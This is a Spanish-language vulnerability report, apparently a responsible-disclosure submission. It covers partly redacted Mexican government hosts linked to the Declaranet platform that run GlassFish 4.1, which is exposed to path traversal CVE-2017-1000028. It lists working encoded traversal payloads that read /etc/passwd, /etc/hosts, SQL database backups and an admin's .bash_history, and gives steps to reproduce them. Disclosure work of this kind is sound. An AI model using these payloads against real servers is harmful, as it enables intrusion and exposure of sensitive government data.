Detalles
==========
Las siguientes ips asociados a la platatorma declaranet:
- 1x8.x.x.2x (axxx.cxxs.gob.mx)
- 1x9.x.x.6x
cuentan con una versión desactualizada de GlassFish server, más especificamente la versión 4.1, la cual tiene vulnerabilidades conocidas y explotables, entre ellas,un path transversal (CVE-2017-1000028), que es la que se abarca en este reporte y que al ser explotada permite a un usuario malintencioado conseguir la lectura de ficheros arbitrarios del servidor remoto.
Payloads basicos:
==========================
- /etc/hosts -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afhosts/
- /etc/passwd -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
Pasos para reproducir
======================
- Abrir el navegador web de tu preferencia
- Dirigirte a https://148.x.x.2x:4848 o https://axxx.cxxs.gob.mx:4848
- Usar cualquiera de las cargas utiles (payloads) proporcionadas más arriba
- Los ficheros (/etc/hosts o /etc/passwd) son volcados como resultado de la petición via GET
PoC1 (148.x.x.2x):
Payloads criticos:
==========================
Los siguientes payloads son funcionales solo para el host 1x9.x.x.6x que de igual manera cuenta con una instancia de GlassFish en el puerto 4848 y vulnerable a CVE-2017-1000028, sin embargo, como se podra notar en la PoC 2, los datos expuestos son mucho más criticos:
- declaranetpxxsxxxx_x-xx-1x.sql -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afhome%c0%afadmin/xxxxups/declaranetpxxsxxxx_x-xx-1x.sql/
- declaranetxxxxxx.sql -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afhome%c0%afadmin/backups/declaranetxxxxxx/
- /home/admin/.bash_history -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afhome%c0%afadmin/.bash_history/